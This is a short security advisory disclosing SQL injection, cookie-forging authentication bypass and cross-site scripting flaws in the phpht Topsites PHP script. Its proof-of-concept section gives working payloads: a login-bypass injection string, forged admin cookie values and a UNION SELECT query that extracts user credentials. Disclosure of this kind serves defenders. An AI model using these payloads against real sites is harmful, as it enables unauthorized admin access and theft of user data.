Multiple Vulnerabilities in phpht Topsites

Description

Multiple Vulnerabilities found in phpht Topsites (http://www.hintondesign.org/downloads/view_cat.php?cat_id=76) script.

1. Authentication Bypass
Vulnerable script: check.php

There are two ways to bypass authentication:

a) SQL Injection
Variable $HTTP_POST_VARS[username] isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off

b) Cookie based authentication
check.php script dont make password comparisson when identifying user by cookies


2. Multiple Cross-Site Scripting
Vulnerable scripts: link_edited.php link_added.php
Most of user-defined data isn't properly sanitized. This can be used to post arbitrary html or script code.


3. Multiple SQL Injections
Vulnerable scripts: all scripts showing some data from database
Most of user-defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off

PoC/Exploit

1. Authentication Bypass

a) SQL Injection
url: http://host/ht/admin.php
Username: ' or 1/*
Password: any

b) Cookie based authentication
Cookie: loged=yes
Cookie: username=admin
Cookie: user_level=1
Cookie: userid=1


2. Cross-Site Scripting Example.
Url:
http://host/phpht/add_link.php
or
http://host/phpht/edit_link.php

Website: <XSS>
Website description: <XSS>


3. SQL Injection Example:
http://host/phpht/link.php?id=99'%20union%20select%201,username,3,4,5,6,7,8,9,10,11 from phpht_users/*

Solution.

To fix this problem install or upgrade to latest version provided by vendor.

Company

• PC Evuln.com / II Evuln.com
• Email:
• skype: evuln.com
• Phone: +37068935936

Services

• Hack Repair
• Hack Insurance
• External Monitoring
• Pricing
• Partner Program

eVuln Labs

• Scanner Statistics
• eVuln Advisories
• Fixing Guide

eVuln Tools

• Malware Scanner
• PHP Code Scanner
• HTTP Packet Generator
• XSS String Encoder
• SQL String Encoder